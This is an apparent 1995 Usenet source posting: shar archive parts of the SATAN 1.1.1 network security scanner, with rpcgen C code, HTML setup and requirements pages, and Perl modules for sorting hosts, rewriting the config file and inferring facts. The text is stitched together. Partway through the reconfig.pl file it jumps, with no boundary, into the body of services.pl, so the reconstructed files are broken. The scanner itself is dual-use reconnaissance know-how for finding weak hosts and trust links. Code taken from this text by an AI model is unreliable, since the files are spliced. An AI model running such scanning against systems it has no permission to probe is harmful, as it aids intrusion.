X "\tif (%s != NULL && !svc_sendreply(%s, xdr_%s, %s)) {\n",
X RESULT, TRANSP, RESULT, RESULT);
X printerr("systemerr", TRANSP);

X f_print(fout, "\t}\n");
X

X printif("freeargs", TRANSP, "&", ARG);
X f_print(fout, "\t\t(void)fprintf(stderr, \"unable to free arguments\\n\");\n");
X f_print(fout, "\t\texit(1);\n");
X f_print(fout, "\t}\n");
X
X f_print(fout, "}\n\n");
X }
X}
X
Xstatic
Xprinterr(err, transp)
X char *err;
X char *transp;
X{
X f_print(fout, "\t\tsvcerr_%s(%s);\n", err, transp);
X}
X
Xstatic
Xprintif(proc, transp, prefix, arg)
X char *proc;
X char *transp;
X char *prefix;
X char *arg;
X{
X f_print(fout, "\tif (!svc_%s(%s, xdr_%s, %s%s)) {\n",
X proc, transp, arg, prefix, arg);
X}
X
X
Xnullproc(proc)
X proc_list *proc;
X{
X for (; proc != NULL; proc = proc->next) {
X if (streq(proc->proc_num, "0")) {

X return (1);
X }
X }

X return (0);
X}
END_OF_FILE

if test 7408 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_svcout.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_svcout.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_svcout.c'
fi
echo shar: End of archive 8 $of 15$.
cp /dev/null ark8isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 133
Archive-name: satan/part09

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/html/docs/getting_started.html
# satan-1.1.1/html/docs/system_requirements.html
# satan-1.1.1/html/reporting/sort_hosts.pl
# satan-1.1.1/perl/config.pl satan-1.1.1/perl/facts.pl
# satan-1.1.1/perl/reconfig.pl satan-1.1.1/perl/services.pl
# satan-1.1.1/reconfig satan-1.1.1/satan.8
# satan-1.1.1/src/fping/fping.man satan-1.1.1/src/nfs-chk/mount.x
# satan-1.1.1/src/rpcgen/rpc_clntout.c
# satan-1.1.1/src/yp-chk/yp-chk.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:09 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 9 (of 15)."'
if test -f 'satan-1.1.1/html/docs/getting_started.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/getting_started.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/getting_started.html'\" $3851 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/getting_started.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Getting started!</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Getting started</H1>
X<HR>
X<p>
X<A NAME="what-you-need"><H3>What you need to do to
X run SATAN even if you don't want to read documentation</H3></A>
X
XIn a nutshell, all you really have to do is type <I>make</I>, edit the
Xconfiguration file <A HREF="satan.cf.html">(config/satan.cf)</A>
Xif desired, and then run SATAN; to use the HTML interface to run SATAN
Xyou may simply type <I>satan</I>, then use <I>SATAN Target selection</I>
Xto choose a target. To run SATAN from the command line you would type
Xsomething like <I>satan victim.com</I>.
X<p>
X<STRONG> Remember - you should run SATAN as "root"!</STRONG>
X<p>
XAfter the probe is done, you can then go into the HTML interface (again, just
Xtype <I>satan</I>), go to the <I>SATAN Reporting & Data Analysis</I>
Xsection. Look at the <I>Vulnerabilities</I> section first, then examine
Xthe other methods (<I>Information</I> and <I>Trust</I>).
X<p>
X<STRONG>One important caveat!</STRONG>
X<p>
XRemember, if you have the <i>tcpd
Xwrappers</i> or some other mechanism that does a reverse finger, turn
Xoff that feature before running SATAN! There is a reasonable chance that
Xsomeone else out on the network will have the same feature turned on, and
Xyou do NOT want to enter into a "finger war" or infinite loop of
Xfingers going back and forth between you and your targets, each of you
Xslowly getting buried in mail and/or logs. Make sure to turn it
Xback on after finishing the data collection, of course!
X
X<p>
X<A NAME="getting-n-compiling"><H3>Getting and compiling
X all those programs if you don't have them already</H3></A>
XYou'll need <i>perl5</i> (see
X<A HREF="system_requirements.html#other-requirements">
Xsystem requirements</A>) as well as a C compiler to get SATAN running properly.
XTo compile and prepare SATAN, look at the
X<A HREF="../tutorials/first_time/make.html">
Xfirst section</A> of the SATAN tutorial.
X
X<p>
X<A NAME="satan-files"><H3>What are all the files for?</H3></A>
XSATAN creates and uses quite a few files, but a user typically only has
Xto really be concerned with one - the configuration file,
X(<A HREF="satan.cf.html">config/satan.cf</A>.) Besides the program files that
Xactually run SATAN, the following files are read or generated by SATAN:
X<OL>
X<li><i>bin/*</i> These are the programs that SATAN depends on for
Xdata acquisition.
X<li><i>config/*</i> Configuration files that SATAN need to find other
Xprograms, and for default settings.
X<li><I>html/*</I>. All of these files are either <i>html</i> pages or
X<i>perl</i> programs to generate the pages for the user interface.
X<li><i>perl/*</i> Code modules used by either SATAN or by the data
Xacquisition tools.
X<li><I>results/database-name</i>. SATAN databases. Each database is made
Xup of three files:
X<ol>
X<li><I>all-hosts</I>. This is a list of all the hosts that
XSATAN found out about during the scan, including hosts that it never touched.
X<li><I>facts</I>. This is a list of all the output records
Xemitted by the <i>*.satan</i> tools. These records are what gets processed
Xby SATAN to generate the reports.
X<li><i>todo</I>. This lists all the hosts and probes
Xthat SATAN actually ran against the hosts. With this table, SATAN knows what
Xprobes it can skip when you scan the hosts again.
X</OL>
X<li><I>rules/*</I>. The rules that SATAN uses to assess the situation
Xand infer facts from the existing information. Extremely flexible
X(simply <i>perl</i> code that is interpreted), this is one of the most powerful
Xfeatures of SATAN. See the <A HREF="satan.rules.html">rules</A> section for
Xmore.
X<li><i>src/*</i> The source code to some of the SATAN support programs.
X</OL>
X
X<hr>

X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 3851 -ne `wc -c <'satan-1.1.1/html/docs/getting_started.html'`; then
echo shar: \"'satan-1.1.1/html/docs/getting_started.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/getting_started.html'
fi
if test -f 'satan-1.1.1/html/docs/system_requirements.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/system_requirements.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/system_requirements.html'\" $3616 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/system_requirements.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>System Requirements</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">System Requirements</H1>
X<HR>
X<P>
XUnfortunately SATAN isn't as portable as we would like it to be, but it
Xstill will run on a fairly large number of Un*x machines. One
Xof the main problems we had is that for it to do all of the tasks that
Xwe wanted and to actually be able to release it within any reasonable
Xtime frame, we had to both rely on many other publically available tools
Xand forego much of our usual testing methodologies. Still under
Xdevelopment, and most often used by us as a research and discovery tool,
Xit will become more robust and portable as we get feedback and are able
Xto test it on more platforms ourselves.
X
X<A NAME="OS"><h3>Operating systems</h3></A>
X
XCurrently SATAN is known to work on the following Operating Systems:
X<UL>
X<LI>SunOS 4.1.3_U1
X<LI>SunOS 5.3
X<LI>Irix 5.3
X</UL>
X
X<A NAME="Hardware"><h3>Hardware platforms</h3></A>
X
XSATAN has been tested with the following machines:
X
X<UL>
X<LI>SPARCstation 4/75
X<LI>SPARCstation 5
X<LI>Indigo 2
X</UL>
XHowever, it should run on quite a few more; try typing <i>make</i> for a
Xlist of the ones we think it'll work on (currently, this is
XAIX, BSD types, IRIX5, HP-UX 9.x, SunOS 4 & 5, SYSV-R4, Ultrix 4.x,
Xand maybe, just maybe, with a bit of tweaking, Linux.)
X
X<A NAME="diskspace"><h3>Disk space</h3></A>
X
XApproximately 20 megabytes of total space is needed to install all of
Xthe supplementary packages and the SATAN program. The bulk of this is
Xdue to the other software packages, chiefly Mosaic or netscape (5.5 MB or
X2.5 MB on a sun) and perl5 (10 MB); SATAN itself takes up about
Xtwo megabytes of space, including the documentation. If the
Xsupplementary programs are already installed, it isn't necessary to
Xreinstall them. If you use the binaries only, it can be as small as
X5 MB for a full installation.
X
X<A NAME="memory"><h3>Memory</h3></A>
X
XMemory is another issue - this is very dependent on how many hosts you're
Xscanning in or are in your database, but rest assured, SATAN is a
X<STRONG>real</STRONG> pig when it comes to memory. From our experiences:
X<p>
XWith approximately 1500 hosts scanned, with approximately 18000 facts in the
Xfacts file took about 14 megabytes of memory on a SPARC 4/75 running
XSunOS 4.1.3.
X<p>
XWith approximately 4700 hosts scanned, with about 150000 facts, it
Xtook up almost 35 megabytes of memory on an Indigo 2.
X<p>
XNeedless to say, swapping is very painful if you don't have enough memory.
X<P>
X<A NAME="other-requirements">
X<h3>Other software tools required and where you can get them</h3></A>
X<p>
X
XWe realize that you may not have all of the additional software required
Xto run SATAN already on your system. If you're not on the Internet,
Xwe're sorry but we currently do not have the resources to help you get
Xall of these programs. Perhaps at some point a tape or CD distribution
Xcould be made (probably by a 3rd party) if the demand is high enough.
X<p>
XAlthough all of it is widely and freely available on the Internet, on a
Xwide number of sites, here are some easy places to find perl, mosaic,
Xand netscape:
X<p>
X<a name="perl"></a>
X<a name="Mosaic"></a>
X<UL>
X<li> <a href="ftp://ftp.cis.ufl.edu/pub/perl/src/5.0/perl5.000.tar.gz">
XPerl, version 5.001</a></li>
X<li> <a href="ftp://ftp.ncsa.uiuc.edu/Mosaic/Unix">
XMosaic, version 2.5</a></li>
X<li> <a href="ftp://ftp.netscape.com/netscape/unix">
XNetscape, version 1.0</a></li>

X</UL>
X
X<p>

X
X<hr>

X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 3616 -ne `wc -c <'satan-1.1.1/html/docs/system_requirements.html'`; then
echo shar: \"'satan-1.1.1/html/docs/system_requirements.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/system_requirements.html'
fi
if test -f 'satan-1.1.1/html/reporting/sort_hosts.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/sort_hosts.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/sort_hosts.pl'\" $4126 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/sort_hosts.pl' <<'END_OF_FILE'
X#
X# Display a list of hosts sorted on some attribute; hosts may be member
X# of more than group.
X#
X
X&make_severity_info();
X
X$_sort_title = "";
X%_sort_group = ();
X$_sort_sub = "";
X%_not_linked = ();
X$_sort_note = "";
X
X#
X# Factor out sort-order dependent code.
X#
X
Xsub sort_alpha {
X $a cmp $b;
X}
X
Xsub sort_severity {
X $_res = ($severity_host_count{$b} <=> $severity_host_count{$a});
X return ($_res != 0) ? $_res : $a cmp $b;
X}
X
Xsub sort_ip {
X local($aip,$bip);
X for $ip (split(/\./,$a)) { $aip = $aip * 256 + $ip; }
X for $ip (split(/\./,$b)) { $bip = $bip * 256 + $ip; }
X return $aip <=> $bip;
X}
X
X$_sort_toc = "sort_alpha";
X
Xif ($_sort_order eq "" || $_sort_order eq "name") {
X $_sort_group{""} = join(' ', @_hosts);
X} elsif ($_sort_order eq "severity") {
X $_sort_group{""} = join(' ', @_hosts);
X $_sort_sub = "sort_severity";
X} elsif ($_sort_order eq "subnet") {
X &make_subnet_info();
X $_sort_title = "Subnet";
X $_sort_link = "satan_results_subnet.pl";
X for (@_hosts) { $_sort_group{$host_subnet{$_}} .= "$_ "; }
X $_sort_toc = "sort_ip";
X} elsif ($_sort_order eq "type") {
X &make_hosttype_info();
X $_sort_title = "System type";
X $_sort_link = "satan_info_OStype.pl";
X for (@_hosts) { $_sort_group{$hosttype{$_}} .= "$_ "; }
X} elsif ($_sort_order eq "domain") {
X &make_domain_info();
X $_sort_title = "Internet domain";
X $_sort_link = "satan_results_domain.pl";
X for (@_hosts) { $_sort_group{$host_domain{$_}} .= "$_ "; }
X} elsif ($_sort_order eq "severity_type") {
X $_sort_title = "Problem type";
X $_sort_link = "satan_severity_hosts.pl";
X for $_host (@_hosts) {
X if (exists($severity_host_type_info{$_host})) {
X for $_type (keys %{$severity_host_type_info{$_host}}) {
X $_sort_group{$_type} .= "$_host ";
X }
X } else {
X $_type = "(none)";
X $_sort_group{$_type} .= "$_host ";
X $_not_linked{$_type} = 1;
X }
X }
X $_sort_note = "Note: a host may appear in more than one category.";
X} elsif ($_sort_order eq "trusted_type") {
X $_sort_title = "Hosts trusted by $_trustee";
X for $_host (@_hosts) {
X for $_type (keys %{$trust_host_type{"$_host $_trustee"}}) {
X $_sort_group{$_type} .= "$_host ";
X $_not_linked{$_type} = 1;
X }
X }
X $_sort_note = "Note: a host may appear in more than one category.";
X} elsif ($_sort_order eq "trustee_type") {
X $_sort_title = "Hosts trusting $_trusted";
X for $_host (@_hosts) {
X for $_type (keys %{$trust_host_type{"$_trusted $_host"}}) {
X $_sort_group{$_type} .= "$_host ";
X $_not_linked{$_type} = 1;
X }
X }
X $_sort_note = "Note: a host may appear in more than one category.";
X}
X
X#
X# Make a nice table of contents.
X#
X
Xif ($_sort_title) {
X print CLIENT <<EOF;
X <hr>
X <h3>$_sort_title: table of contents.</h3>
X <ul>
XEOF
X for $_group (sort $_sort_toc keys %_sort_group) {
X $_count = $_bad = 0;
X for $_host (split(/\s/, $_sort_group{$_group})) {
X $_count++;
X $_bad++ if exists($severity_host_type_info{$_host});
X }
X $_dot = $_bad ? "reddot" : "blackdot";
X $_alt = $_bad ? "*" : "-";
X $_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)";
X print CLIENT <<EOF;
X <dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" ALT="$_alt">
X <a href="#$_group">$_group</a> $_counts
XEOF

X }
X print CLIENT <<EOF;

X </ul>
X $_sort_note
X <hr>
XEOF
X}
X
X#
X# Finally, list all those groups and their respective host members.
X#
X
X$_sort_sub = "sort_alpha" if $_sort_sub eq "";
X
Xfor $_group (sort $_sort_toc keys %_sort_group) {
X if ($_sort_title) {
X print CLIENT <<EOF;
X <h3>
X <a name="$_group">
X $_sort_title:
XEOF
X if ($_not_linked{$_group}) {
X print CLIENT <<EOF;
X $_group.
XEOF
X } else {
X ($_GROUP = $_group) =~ tr / \//?!/;
X print CLIENT <<EOF;
X <a href="$_sort_link,$_GROUP,">$_group</a>.
XEOF

X }
X print CLIENT <<EOF;

X </h3>
XEOF

X }
X print CLIENT <<EOF;

X <ul>
XEOF
X for (sort $_sort_sub split(/\s/, $_sort_group{$_group})) {
X if ($severity_host_count{$_}) {
X $_dot = "reddot";
X $_alt = "*";
X $_bad = "($severity_host_count{$_})";
X } else {
X $_dot = "blackdot";
X $_alt = "-";
X $_bad = "";

X }
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">
X <a href="satan_info_host.pl,$_,"> $_</a> $_bad
XEOF

X }
X print CLIENT <<EOF;

X </ul>
XEOF
X}
END_OF_FILE
if test 4126 -ne `wc -c <'satan-1.1.1/html/reporting/sort_hosts.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/sort_hosts.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/sort_hosts.pl'
fi
if test -f 'satan-1.1.1/perl/config.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/config.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/config.pl'\" $1519 characters$
sed "s/^X//" >'satan-1.1.1/perl/config.pl' <<'END_OF_FILE'
X#
X# rewrite satan.cf after the user changes it.
X#
X# suck in the changes, then just cycle through each line of the .cf file.
X# if there is a match, put the new value in there.
X#
Xsub write_config_file {
Xlocal($new_values) = @_;
Xlocal(%new_values, $variable, $old_variable, $old_value);
X
X#
X# split the strings into something easier to handle
Xfor ( split(/\n/, $new_values) ) {
X next if !$_;
X
X ($variable, $value) = split(/=/, $_);
X
X # need to stick a dollar sign in front of var
X $variable = "\$" . "$variable";
X # and quotes around non-numbers
X if ($value !~ /^\d+$/) { $value = "\"$value\""; }
X
X $new_values{$variable} = $value;
X }
X
X#
X# open the config and the scratch file
X#
Xdie "Can't read $SATAN_CF file!\n" unless open(CF, "$SATAN_CF");
Xdie "Can't write $SATAN_CF.new file!\n" unless open(CFN, ">$SATAN_CF.new");
X
Xwhile (<CF>) {
X # punt if the going gets too tough...
X if (!/^\$/) {
X print CFN $_;
X next;
X }
X
X chop;
X ($old_variable, $old_value) = split(/=\s+/, $_);
X
X # kill spaces and semicolons
X $old_variable =~ s/\s//g;
X $old_value =~ s/;//g;
X
X # suck in the lines, compare them to each of the vars gotten from user
X for $variable (keys %new_values) {
X if ($variable eq $old_variable) {
X $old_value = $new_values{$variable};
X }
X }
X
X print "CF: $_ ($old_variable, $old_value)\n";
X print CFN "$old_variable = $old_value;\n";
X }
X
Xclose(CF);
Xclose(CFN);
X
X# move the evidence to where it belongs... old to .old, new to .cf:
Xsystem("mv $SATAN_CF $SATAN_CF.old");
Xsystem("mv $SATAN_CF.new $SATAN_CF");

X
X}
X
X1;
END_OF_FILE

if test 1519 -ne `wc -c <'satan-1.1.1/perl/config.pl'`; then
echo shar: \"'satan-1.1.1/perl/config.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/config.pl'
fi
if test -f 'satan-1.1.1/perl/facts.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/facts.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/facts.pl'\" $4628 characters$
sed "s/^X//" >'satan-1.1.1/perl/facts.pl' <<'END_OF_FILE'
X#
X# add_fact($record) add one record to the new facts list.
X#
X# process_facts() iterates over all new facts and generates new facts or
X# new todo items. It keeps looping until the new facts list becomes empty.
X#
X# save_facts($path) saves the old facts to the named file.
X#
X# read_facts($path) reads the old facts from the named file.
X#
X# merge_facts($path) merge with i-core tables.
X#
X# redo_old_facts() re-applies the todo/fact rules in case the probe
X# level or rule base have changed (or we would never see any effect
X# of changing todo/fact rules with already collected data).
X#
X# drop_old_facts() forgets all old facts we have about a host.
X#
X# Warning: all facts processing that invokes inference engines MUST set $_.
X#
X# version 1, Sun Mar 19 9:48:44 1995, last mod by zen
X#
X
X#
X# Add one fact to the new facts list, with duplicate suppression.
X#
Xsub add_fact {
X local($fact) = @_;
X
X if (!exists($old_facts{$fact}) && !&drop_fact($fact) && !exists($new_facts{$fact})) {
X $new_facts{$fact} = 1;
X print "Add-fact: $fact\n" if $debug;
X }
X}
X
X#
X# Iterate over the new facts list until nothing new shows up.
X#
Xsub process_facts {
X local(%temp_facts);
X
X while(&sizeof(*new_facts) > 0) {
X %temp_facts = %new_facts;
X %new_facts = ();
X for (keys %temp_facts) {
X if (&satan_split($_)) {
X warn "Ill-formatted fact: $_\n";
X next;
X }
X $old_facts{$_} = 1;
X if ($status ne "u") {
X #
X # Stage 1: update the per-host tables.
X #
X &infer_hosttype($_);
X &infer_services($_);
X &update_severities($_);
X &update_trust($_);
X
X #
X # Stage 2: generate new probes and derive
X # new facts, using all information that
X # has been collected sofar. Derive new
X # targets from trust relationships
X # (ignore localhost).
X #
X &infer_todo($_);
X &infer_facts($_);
X if (($trusted =~ /([^@]+)$/) && ($1 ne "ANY")
X && ($1 !~ /^localhost\.?/i)) {
X &new_target(&fix_hostname($1, $target),
X &get_proximity($target) + 1);

X }
X }
X }
X }
X}

X
X#
X# Save facts to named file.
X#
Xsub save_facts {
X local($path) = @_;
X
X open(FACTS, ">$path") || die "cannot save facts to $path: $!";
X for (keys %old_facts) {
X print FACTS "$_\n";
X }
X close(FACTS);
X}
X
X#
X# Reset facts tables and derivatives
X#
Xsub clear_facts {
X %old_facts = ();
X %new_facts = ();
X &clear_hosttype_info();
X &clear_service_info();
X &clear_severity_info();
X &clear_trust_info();
X}
X
X#
X# Load facts from named file.
X#
Xsub read_facts {
X local($path) = @_;
X
X &clear_facts();
X &merge_facts($path);
X}
X
X#
X# Merge facts with in-core tables.
X#
Xsub merge_facts {
X local($path) = @_;
X
X open(FACTS, $path) || die "Cannot read facts file $path: $!";
X print "Reading facts from $path...\n" if $debug;
X while (<FACTS>) {
X chop;
X if (!exists($old_facts{$_})) {
X if (&satan_split($_)) {
X warn "Warning - corrupted $path record: $_\n";
X next;
X }
X $old_facts{$_} = 1;
X if ($status ne "u") {
X &infer_hosttype($_);
X &infer_services($_);
X &update_severities($_);
X &update_trust($_);
X &infer_facts($_);
X }
X }
X }
X &process_facts();
X close(FACTS);
X}
X
X#
X# Forget all old facts we have on a specific host.
X#
Xsub drop_old_facts {
X local($host) = @_;
X local($fact, $target);
X
X for $fact (keys %old_facts) {
X ($target) = split(/\|/, $fact);
X if ($target eq $host) {
X print "Deleting: $fact\n" if $debug;
X delete $old_facts{$fact};

X }
X }
X}
X
X#

X# Re-apply todo/fact rules in case attack level or rule base has changed.
X#
Xsub redo_old_facts {
X
X for (keys %old_facts) {
X &satan_split($_);
X &infer_todo($_);
X &infer_facts($_);
X }
X &process_facts();
X}
X
X#
X# Some scaffolding code for stand-alone testing.
X#
Xif ($running_under_satan) {
X require 'perl/misc.pl';
X require 'perl/fix_hostname.pl';
X require 'perl/infer_todo.pl';
X require 'perl/infer_facts.pl';
X require 'perl/drop_fact.pl';
X require 'perl/hosttype.pl';
X require 'perl/services.pl';
X require 'perl/severities.pl';
X require 'perl/trust.pl';

X} else {
X $running_under_satan = -1;
X $debug = 1;
X
X require 'perl/misc.pl';

X require 'perl/fix_hostname.pl';
X require 'perl/infer_todo.pl';
X require 'perl/infer_facts.pl';
X require 'perl/drop_fact.pl';
X require 'perl/hosttype.pl';
X require 'perl/services.pl';
X require 'perl/severities.pl';
X require 'perl/trust.pl';
X
X warn "facts.pl running in stand-alone mode\n";
X
X eval "sub add_todo { local(\$target,\$tool,\$args) = \@_;
X print \"add_todo: \$target,\$tool,\$args\\n\"; }\n";
X eval "sub new_target { local(\$new,\$old) = \@_;
X print \"new_target: \$new,\$old\\n\"; }\n";
X print "Adding new facts...\n";

X while (<>) {
X chop;

X &add_fact($_);
X }
X
X print "Processing new facts...\n";
X &process_facts();
X}
X
X1;
END_OF_FILE
if test 4628 -ne `wc -c <'satan-1.1.1/perl/facts.pl'`; then
echo shar: \"'satan-1.1.1/perl/facts.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/facts.pl'
fi
if test -f 'satan-1.1.1/perl/reconfig.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/reconfig.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/reconfig.pl'\" $4007 characters$
sed "s/^X//" >'satan-1.1.1/perl/reconfig.pl' <<'END_OF_FILE'
X#!/usr/local/bin/perl
X
X# Usage: reconfig [file]
X#
X# This replaces the program paths (e.g. /bin/awk) in SATAN with an
X# alternate path that is found in the file "file.paths". It also finds
X# perl5 (or at least tries!) and changes the path in all the stand-alone
X# perl programs.
X#
X
X# all the HTML browsers we know about, IN ORDER OF PREFERENCE!
X@all_www= ("netscape", "Mosaic", "xmosaic", "lynx");
X
X#
X# Potential directories to find commands; first, find the user's path...
X$PATH = $ENV{"PATH"};
X
X# additional dirs; *COLON* separated!
X$other_dirs="/usr/ccs/bin:/bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/ucb/bin:/usr/sbin:/usr/etc:/usr/local/bin:/usr/bin/X11:/usr/X11/bin";
X
X#
X# split into a more reasonable format:
X@all_dirs = split(/:/, $PATH . ":" . $other_dirs);
X
X#
X# Target shell scripts in question:
X@shell_scripts=("paths.pl", "rex.satan", "rsh.satan", "tftp.satan");
X@perl5_src = <get_targets faux_fping *satan* html.pl>;
X
X#
X# Target shell commands in question
X@all_commands=("cc", "cat", "chmod", "cmp", "comm", "cp", "date", "diff",
X "egrep", "expr", "find", "grep", "ls", "mail", "mkdir", "mv", "rm",
X "sed", "sh", "sort", "tftp", "touch", "uniq", "uudecode", "ypcat",
X "strings", "finger", "ftp", "rpcinfo", "rusers", "showmount",
X "ypwhich", "nslookup", "xhost", "su", "awk", "sed", "test");
X
Xprint "checking to make sure all the target(s) are here...\n";
X
Xfor (@shell_scripts) {
X die "ERROR -- $_ not found!\n" unless -f $_;
X }
X
X# find perl5!
Xprint "Ok, trying to find perl5 now... hang on a bit...\n";
Xfor $dir (@all_dirs) {
X # first, find where it might be; oftentimes you'll see perl,
X # perl4, perl5, etc. in the same dir
X while (<$dir/perl5* $dir/perl*>) {
X if (-x $_) {
X $perl_version=`($_ -v 2> /dev/null) |
X awk '/This is perl, version 5/ { print $NF }'`;
X if ($perl_version) {
X $PERL=$_;
X $pflag="1";
X last;
X }
X }
X last if $pflag;
X }
X last if $pflag;
X }
X
Xdie "\nCan't find perl5! Bailing out...\n" unless $PERL;
Xprint "\nPerl5 is in $PERL\n";
X
Xfor (@perl5_src) { $perl5_src .= "$_ "; }
Xprint "\nchanging the perl source in: $perl5_src\n";
Xsystem "$PERL -pi -e \"s@/usr/local/bin/perl.*@$PERL@;\" $perl5_src";
X
X# make sure things are executable...
Xsystem("chmod u+x $perl5_src");
X
X# find the most preferred www viewer first.
Xfor $www (@all_www) {
X for $dir (@all_dirs) {
X if (!$MOSAIC) {
X if (-x "$dir/$www") {
X $MOSAIC="$dir/$www";

X next;
X }
X }
X }

X $code .= "\tlocal(\$type);\n";
X

X foreach $file (split(/\s+/, $files)) {
X open(RULES, $file) || die "cannot open $file: $!";
X while (<RULES>) {
X chop;
X while (/\\$/) {
X chop;
X $_ .= <RULES>;
X chop;
X }
X s/#.*$//;
X s/\s+$//;
X next if /^$/;

X if (/^(servers|clients)/i) {
X ($class = $1) =~ tr /A-Z/a-z/;
X } else {
X s/@/\\@/g;
X ($cond, $type, $host) = split(/\t+/, $_, 3);
X die "missing service name" if $type eq "";
X $host = "\$target" if $host eq "";

X $code .= "\
X if ($cond) {

X \$$class\{\"$type\"}{$host} .= \$_ . \"\\n\";
X \$service_flag = 0;
X }
X";
X # %{${$class}{$type}} = ();

X }
X }
X close(RULES);
X }

X $code .= "}\n";

X return $code;
X}
X
X#

X# Generate services-dependent statistics.
X#
Xsub make_service_info {
X local($service, $host, %junk);
X
X if ($service_flag > 0) {
X return;
X }
X $service_flag = time();
X &make_severity_info();
X
X print "Rebuild service type statistics...\n" if $debug;
X
X %server_info = ();
X for $service (keys %servers) {
X %junk = %{$servers{$service}};
X $server_counts{$service} = sizeof(*junk);
X $server_severities{$service} = 0;
X for $host (keys %junk) {
X $server_info{$host} .= $service . "\n";

X if (exists($severity_host_type_info{$host})) {

X $server_severities{$service}++;
X }
X }
X }
X %client_info = ();
X for $service (keys %clients) {
X %junk = %{$clients{$service}};
X $client_counts{$service} = sizeof(*junk);
X $client_severities{$service} = 0;
X for $host (keys %junk) {
X $client_info{$host} .= $service . "\n";

X if (exists($severity_host_type_info{$host})) {

X $client_severities{$service}++;

X }
X }
X }
X}
X

X#
X# Reset the service information tables.
X#
Xsub clear_service_info {
X %servers = ();
X %clients = ();
X %server_severities = ();
X %client_severities = ();
X %server_info = ();
X %client_info = ();
X $service_flag = 0;

X}
X
X#
X# Some scaffolding for stand-alone operation
X#
Xif ($running_under_satan) {

X eval &build_infer_services($services_files);
X die "error in $services_files: $@" if $@;

X} else {
X $running_under_satan = -1;
X $debug = 1;
X
X require 'perl/misc.pl';
X
X #
X # Generate code from rules files.
X #

X $code = &build_infer_services($services_files);
X print "Code generated from $services_files:\n\n";

X print $code;
X eval $code;

X die "error in $services_files: $@" if $@;

X
X #
X # Apply rules.
X #
X print "\nApplying rules to all SATAN records...\n";
X while (<>) {
X chop;
X if (&satan_split($_) == 0) {

X &infer_services(_);
X }
X }
X &make_service_info();
X
X print "Servers\n";
X for $service (sort keys %servers) {
X print "\t$service ($server_counts{$service})\n";
X for (sort keys %{$servers{$service}}) {
X print "\t\t$_\n";
X }
X }
X print "Clients\n";
X for $service (sort keys %clients) {
X print "\t$service ($client_counts{$service})\n";
X for (sort keys %{$clients{$service}}) {
X print "\t\t$_\n";
X }

X }
X}
X
X1;
END_OF_FILE

if test 3979 -ne `wc -c <'satan-1.1.1/perl/services.pl'`; then
echo shar: \"'satan-1.1.1/perl/services.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/services.pl'
fi
if test -f 'satan-1.1.1/reconfig' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/reconfig'\"
else
echo shar: Extracting \"'satan-1.1.1/reconfig'\" $4751 characters$
sed "s/^X//" >'satan-1.1.1/reconfig' <<'END_OF_FILE'
X#!/bin/sh -- need to mention perl here to avoid recursion
X'true' || eval 'exec perl -S $0 $argv:q';
Xeval '(exit $?0)' && eval 'exec perl -S $0 ${1+"$@"}'
X& eval 'exec /usr/local/bin/perl -S $0 $argv:q'
X if 0;
X
X#
X# version 1, Sun Mar 26 18:31:28 1995, last mod by zen
X#
X
X# Usage: [perl] reconfig [file]
X#
X# This replaces the program paths (e.g. /bin/awk) in SATAN with an
X# alternate path that is found in the file "file.paths". It also finds
X# perl5 (or at least tries!) and changes the path in all the stand-alone
X# perl programs.
X#
X
X# all the HTML browsers we know about, IN ORDER OF PREFERENCE!
